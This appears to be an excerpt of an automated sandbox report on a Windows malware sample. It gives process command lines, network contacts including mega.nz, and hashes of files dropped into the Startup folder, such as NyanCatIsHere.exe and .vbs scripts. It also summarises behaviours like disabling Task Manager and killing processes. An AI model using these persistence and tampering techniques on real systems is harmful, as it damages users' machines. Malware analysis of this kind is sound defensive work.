"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xc4,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7824 /prefetch:1
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7852 /prefetch:1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs"
C:\Windows\SysWOW64\timeout.exe
Timeout 55
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 5.144.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.127.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 15.125.203.66.in-addr.arpa | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| NL | 52.111.243.29:443 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.thisworldthesedays.com | udp |
| US | 64.91.240.248:443 | www.thisworldthesedays.com | tcp |
| US | 64.91.240.248:443 | www.thisworldthesedays.com | tcp |
| US | 8.8.8.8:53 | ww12.thisworldthesedays.com | udp |
| US | 8.8.8.8:53 | 248.240.91.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 75.2.81.221:80 | ww12.thisworldthesedays.com | tcp |
| US | 8.8.8.8:53 | parking.parklogic.com | udp |
| US | 67.225.218.50:80 | parking.parklogic.com | tcp |
| US | 67.225.218.50:80 | parking.parklogic.com | tcp |
| US | 8.8.8.8:53 | d38psrni17bvxu.cloudfront.net | udp |
| GB | 99.86.249.97:80 | d38psrni17bvxu.cloudfront.net | tcp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| US | 8.8.8.8:53 | 221.81.2.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.218.225.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| GB | 172.217.16.238:443 | www.adsensecustomsearchads.com | tcp |
| GB | 142.250.178.2:443 | partner.googleadservices.com | tcp |
| US | 8.8.8.8:53 | 97.249.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d25hvf57b1t0vp.cloudfront.net | udp |
| GB | 13.249.247.16:443 | d25hvf57b1t0vp.cloudfront.net | tcp |
| GB | 13.249.247.16:443 | d25hvf57b1t0vp.cloudfront.net | tcp |
| US | 8.8.8.8:53 | team.epccm19.com | udp |
| US | 8.8.8.8:53 | www.ccm19.de | udp |
| DE | 78.47.121.208:443 | team.epccm19.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 16.247.249.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.121.47.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.16.238:443 | ogs.google.com | tcp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | content.googleapis.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | blobcomments-pa.clients6.google.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | tcp |
| US | 8.8.8.8:53 | drive-thirdparty.googleusercontent.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| GB | 216.58.201.97:443 | drive-thirdparty.googleusercontent.com | tcp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | content.googleapis.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
| MD5 | aacce8318a2e5f0a43c8cd50907d6d29 |
| SHA1 | fd5da11bbbcdb2421186626f461cb48fc634760c |
| SHA256 | 7217260d8d9c6b0b6c8b797f64c516d8ebe4db48dc8a5fced46eab9082378724 |
| SHA512 | 8991368b7e5391b37c4584eedddfbb4041ddc554acad9742b390aad7b5b4791c106d1068b7c9c29cda9e14bd62e5c36894318246c247576162c54f30076190b5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
| MD5 | b3904e987387ac3ff87b2d16e3e28156 |
| SHA1 | d575167f14fc84625b1525e8a0dfa27c514b1357 |
| SHA256 | 143bb189902ec44987f475f6fce4c0f90c072e5d732dae58b5f79a3c31b5f584 |
| SHA512 | a105063b598555d2b4c1a3950a7ac120ffc72ad362e6c76a364b48ff8c32e8daea48ef362b22aa62d848af1c20d3ef7c6536e717e874c6fad329ec0c22e9268f |
memory/4696-21-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\65AF.tmp\Acid Rain.bat
| MD5 | 16a6fe0a61c21d85803c2b8383d5d3c2 |
| SHA1 | fec9adfac8c278c3dc548989a97c574ccdcb0934 |
| SHA256 | 1942dd34f70465202360d5f299e7160cea4d108ac4305a94dbabd9b97f4b7bd0 |
| SHA512 | 6dd03c5c69caf470584153e5e91ae074868e3002dcc76a07e1782c8d23fa8f309c09b0a50b787606be958f051ef0fdb67d24d0c91eee261549d6d60b857ce061 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 279e783b0129b64a8529800a88fbf1ee |
| SHA1 | 204c62ec8cef8467e5729cad52adae293178744f |
| SHA256 | 3619c3b82a8cbdce37bfd88b66d4fdfcd728a1112b05eb26998bea527d187932 |
| SHA512 | 32730d9124dd28c196bd4abcfd6a283a04553f3f6b050c057264bc883783d30d6602781137762e66e1f90847724d0e994bddf6e729de11a809f263f139023d3b |
\??\pipe\LOCAL\crashpad_2376_JTDHADGPFXJUSQVR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | cbec32729772aa6c576e97df4fef48f5 |
| SHA1 | 6ec173d5313f27ba1e46ad66c7bbe7c0a9767dba |
| SHA256 | d34331aa91a21e127bbe68f55c4c1898c429d9d43545c3253d317ffb105aa24e |
| SHA512 | 425b3638fed70da3bc16bba8b9878de528aca98669203f39473b931f487a614d3f66073b8c3d9bc2211e152b4bbdeceb2777001467954eec491f862912f3c7a0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a019fd20637ad54654c6ca1d473b5341 |
| SHA1 | 46722480f198100e406af7590f49364afaa15f95 |
| SHA256 | 7fd954025d5fc43d5205881a42d56f2fa51590701d03cf0785dec9124ff2f300 |
| SHA512 | 8d24bf277e62d4501684ad14f015cc0519691532a09d8b4ad40adc3d161ac48c8635cbafe7f84c438839442553931dd293ec167ffc0472c4ae19daa242bb11f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 361f52ce5a7922454368c1893b1bad73 |
| SHA1 | 9c5525b8fa5c2e6e1d16c0cd1eed35f6f4b18391 |
| SHA256 | cd03b3a8783f7028cf8c6f4f1474db97628789aefe9c408535d0348d9535bc03 |
| SHA512 | 00002c85ae14355838e111ce438748aed1a10ae6c56e62d28af1ca0aced9056e1cd97e191078e6d634cd60ec5ef4837bfb578616a5d3a921cb99fe895b4d6df6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7524a4c0a73f79a31dbccbc12f0396b4 |
| SHA1 | b246a7c4ddf5750bb9cc3cba4f02745d44ea8fe5 |
| SHA256 | 2053c4258660c8f0cfe828b30ae253e090e05a6ee5a35bd6d3b02849424abb7d |
| SHA512 | 62a32bbf930d186dfee3d9fef65f57fbdd849c0546c8c43dc403ab7a3de5416d3fce62582262f2d7f04a55da0630284a4039e0ceff514c4cfca57f7442922062 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 11fbcaf5e7074e9c4cb81aade5474d75 |
| SHA1 | 259dac025231921c51a44ffd32b88d89c3ee81cf |
| SHA256 | f77d79c32614bd435c3d05a79e50ba739f2ec6e537f1a017ffec135e91dd5393 |
| SHA512 | e46e316cb99463924ecf98aab56f73f7fcb17142bc3f4c16c7650ef7b6c72ffadb0b2f364d672f64cbf84f2b7119a983fb111284662a7f12370164b5f32bc332 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 0db16858f98587ce21433f84613c6924 |
| SHA1 | 2798dd5fae3ec06df3913ee8b7d3d4162fc81983 |
| SHA256 | f5dde6dd712f90552a73f62528c6d7d9aab76f503220f6fe6b375dafec0f4584 |
| SHA512 | a76dadf75650f2e7e6484ce8752fab533f93bb14d0b890767c5242b70d387f47d48df91eda7b386a2c0871fa5fcbc5008314892d8a34c741b6f5704b1d981e55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c1e8.TMP
| MD5 | 632fca4dc6dfcfc0d06a5c3239b90a31 |
| SHA1 | d6b230019dbc261aecd5719ff2a73508b4896c51 |
| SHA256 | 5ba25536ad7908be97c4a45cf61123c258aa571e26a8282120086382bf289b43 |
| SHA512 | 77be98d322b8cfcac2e1239b3f72580ef6da171c68212df6b56cff165320aa73fd5088a4fcf984a74fdeee5cf3f724fd4b7da66584467351f469107f651b26fe |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs
| MD5 | 139b5edf5ba8a4aa768281a29cac1649 |
| SHA1 | da8a2d689695a749288f161032e1f042122e89d5 |
| SHA256 | 1dd686325c7471a59a43142c6d7dec01047b3e95147254b235fbc3652f923a7c |
| SHA512 | ebf47fe1de3dca337a891330e7a97fbcf6c899a212be1c07f666d8d1179f116a70b4fcc66accfff3e3942ec83c79170882c8d48019feee0a02ffb57f66e61af8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 496f8a78c46b3f33fcbc75b6fe25a37f |
| SHA1 | 7e99c9735cb294098831e022a9db3fe5b50c47d6 |
| SHA256 | a250cfa45985eb088ae73fd0c4b4117e217ccef32dc8a19eae36e9f35c7ab4f2 |
| SHA512 | c00c9de6e22ed70d599776f86ac0a7894ae3fd26328d84ed6491956b3e14872e17ff4d8782585873c7a0dee36adc6f4a3e7b0cd23fa028354daf74f1693c19f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 51c98286c79d7027f088e9ad3e28c302 |
| SHA1 | 19690c6a99c1745b150ef7f91b82599a61282b83 |
| SHA256 | 2b57457ac063a6b0e5f37d8d2eb196442df19b4fbfb2f83f2fbbde313fc5f02e |
| SHA512 | 918f352401e85156e964e83ad0ea8f3cd440743ec0f311b4506de6133f10f8bb5bf56404a38f7ae3c5674c2474046276c2084eb3aa8f2cd12a1ed716008c79c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585d4e.TMP
| MD5 | b1528b160e2d190b0ea5bbee2a5cf736 |
| SHA1 | 9ca9a9c6eb18e6ab492a4c6ee906fb8afd085815 |
| SHA256 | 5d429911d4c740580df48ef969585e2df061c72cf23bda9f1bb95869f2fe865a |
| SHA512 | 457e3fc5c4b9aa7847969e362dce83017a6cee3a165a01492b72965eb951cf89952a182db79c0fced5b7df86145473c4936fc23ef5f7fb14f3b8f22f76fcc827 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 008114e1a1a614b35e8a7515da0f3783 |
| SHA1 | 3c390d38126c7328a8d7e4a72d5848ac9f96549b |
| SHA256 | 7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18 |
| SHA512 | a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a6a9b8960d263071187d182b7974d2ab |
| SHA1 | 74933ed0423d22f42dd99b1a343d808a31dac42a |
| SHA256 | 7c883e29bb97925b471301d89d2e582900a414eba4745e87a5ce68884076b543 |
| SHA512 | 86dda7116f94f15d3d6cb4fab57fde6217b4cb1adf9e080b690d37e3d349dae1c18fbb21f048f34b0ad10c2dfd569a56479c0370f8de032f3288ef4e00f32f92 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021
| MD5 | 89d79dbf26a3c2e22ddd95766fe3173d |
| SHA1 | f38fd066eef4cf4e72a934548eafb5f6abb00b53 |
| SHA256 | 367ef9ec8dc07f84fed51cac5c75dc1ac87688bbf8f5da8e17655e7917bd7b69 |
| SHA512 | ab7ce168e6f59e2250b82ec62857c2f2b08e5a548de85ac82177ac550729287ead40382a7c8a92fbce7f53b106d199b1c8adbb770e47287fc70ea0ea858faba6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022
| MD5 | b82ca47ee5d42100e589bdd94e57936e |
| SHA1 | 0dad0cd7d0472248b9b409b02122d13bab513b4c |
| SHA256 | d3c59060e591b3839ec59cad150c0a38a2a2a6ba4cc4dc5530f68be54f14ef1d |
| SHA512 | 58840a773a3a6cb0913e6a542934daecaef9c0eeab626446a29a70cd6d063fdb012229ff2ccfa283e3c05bc2a91a7cac331293965264715bdb9020f162dc7383 |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 9a0107076a89380e86d25b2f4c9d6e1e |
| SHA1 | 22975ec91a77e0333bdd7ab34f747ed070c10d8b |
| SHA256 | e98514fac8ec2c526c34912f1e7d15c29b44c72b7a3f9d6a5cf4eb499a71c07c |
| SHA512 | 0a6b1b51b282449af7506459bc751eac8da9201d6668f6ae3ae28324f2f5b3ad9e5ea98937f5076920fe0c0877b40bdc52b1a2ee69937310ab9f0326f4aec8a9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\68bb91177c1a462f_0
| MD5 | 5eb1bdcbeaba836098d9fcefd6db3a44 |
| SHA1 | 2456dc82f1430c67bfc18108895b813bf26f9c23 |
| SHA256 | 10db08ab3328fb1eb667ac2515e5ba83df2b1a5f354c65630486f457bf7fa0bb |
| SHA512 | 37872d12c88dcbc6de0bd80718ce4c9f269a8a0df403b9122be3996b5657866dff788d2304492a0d0364aba3c4a1452d329f91285fcf481206cf3e57c3cb610b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c8d05f7bb9b5d749_0
| MD5 | c3212ff3c41836e6bbfd0d8e9debb873 |
| SHA1 | 0595fae4d208e4b7d75a4306e790ecaf47d5d102 |
| SHA256 | 8d06c661fc0790f3a1859aa79841b67a4820a0a8ceeddedfaaf2223df719c366 |
| SHA512 | b19ac577e0fccb64f1e488258fe9d34b02d56032520738bb416786ef725b0f91e021801b1c376198162b40966adbf935dc7927287e8d6a4459fb5d7761417163 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5170db8681ca4a8146c51ae39efb5773 |
| SHA1 | 3e215439a68a3f461ab5d41b4a48df37a0e5d369 |
| SHA256 | e15b65f83b8440971213275e78310ca87a6f828156930f6dad1b5ff929d082c4 |
| SHA512 | 2ceab3c391dba26bb62eabeb08f3cf81b20d5f2933774c6a1d33aec2c1ca9f3edf1e2df4c1f79d6bd1320eb20786c973b58049f58dc57acc263ba6c0fccf26f9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs
| MD5 | 076eec2d750fb2a85461d8b227b96124 |
| SHA1 | d1a6638bc96e6e3adf0ca3e3cb4c846f77e365d8 |
| SHA256 | a596e5753416572e877fe630002dc42afdbfa9ca80473e1385017b37e082a1a4 |
| SHA512 | 5c6ff87335577061483cbf79333728085f198a4ee56fabab7d2fc401cbe8b146ee5ad174a6c1f5ba02095b186bb0f3729a5927b7fda4feeb6f5ae7411fa70ab5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 497b8c38d8c85120ef5f21eece038e6e |
| SHA1 | 6b2642996f6565c9b65827abcdf19983b86e9bc2 |
| SHA256 | 23d25c83f6cdbc656b7a36a250b8cbbc45ebf4d2ca7319bbffb879a26732a9d5 |
| SHA512 | 68b7b140f7ac2c5854e827cbb32fcb9c8b9f3c3112cce8c43c2e34d4db9946036b8ad63b912a9a7b0920eede93d60670a348123c6a527751e9080a0221aa3135 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f5c39b9eddc5fd42_0
| MD5 | f8f9b521062b05c5ba5c12fb8093faff |
| SHA1 | df35c4034a5c66731d2d1c810cec5b53f96715f9 |
| SHA256 | 5c204b132f4d304f11c1aa188c117599b23fd1148b91593cd73b14feb8062649 |
| SHA512 | 4dc91c3391b796c1e179b8efb805d23ce7cc97535571e172e2884c5ead09e126a7339ff3286cc6bb861d0c06c24fe69b7283f180e1b8f23c59ed3fe4a872a0fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6fe5790011b495415b85a0a72a39d050 |
| SHA1 | c22f4d04ff97aeb7c5edb6687e7d865de15b0da1 |
| SHA256 | d885ab6e3a297bab898b4193aac36565728963d0291ccd5aab140077f2b07989 |
| SHA512 | fb6171411ac300166280b221c06f7d50b3d0f2f8b740fa893755da23081c3d8bf73758e07788f6df0147eac628a9d233a720224b8596e53b126700bbb4a504a8 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs
| MD5 | 70b06bab45636ed2ce89ffa1a56a2eda |
| SHA1 | 781043fb2a866fc38233be0b8beccd7fbeb0513d |
| SHA256 | a9644355bc115a7a8fce8603643254f8061cce0e1af9db037b2bda9ca62f4fff |
| SHA512 | a8a3d984b253e83c6ab4c4ad9b6ba773f69166204649be63d6850136523861e42132411d1fce3a83c4408f8051413101f5835136cecfad2b8022cc3489f004aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 89512132143859dbccabcdec0e45a649 |
| SHA1 | 8c039a9564ecada086f7f6713c85ee551fd3d252 |
| SHA256 | c90aa193d853c412d24c0eb4389c591612fcb69345e47193658ecb08c639be56 |
| SHA512 | 611fec23d3a1b5d2793b41419934855e7d0bebe8b2c74dffabb6cab70e411e551809ee06bec04a3a3b86ad0b96579cf471b12403b39902746cf87c54a0c93867 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win7-20240221-en
Max time kernel
150s
Max time network
165s
Command Line
Signatures
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Killer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Error_icons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New_Names.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
Loads dropped DLL
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
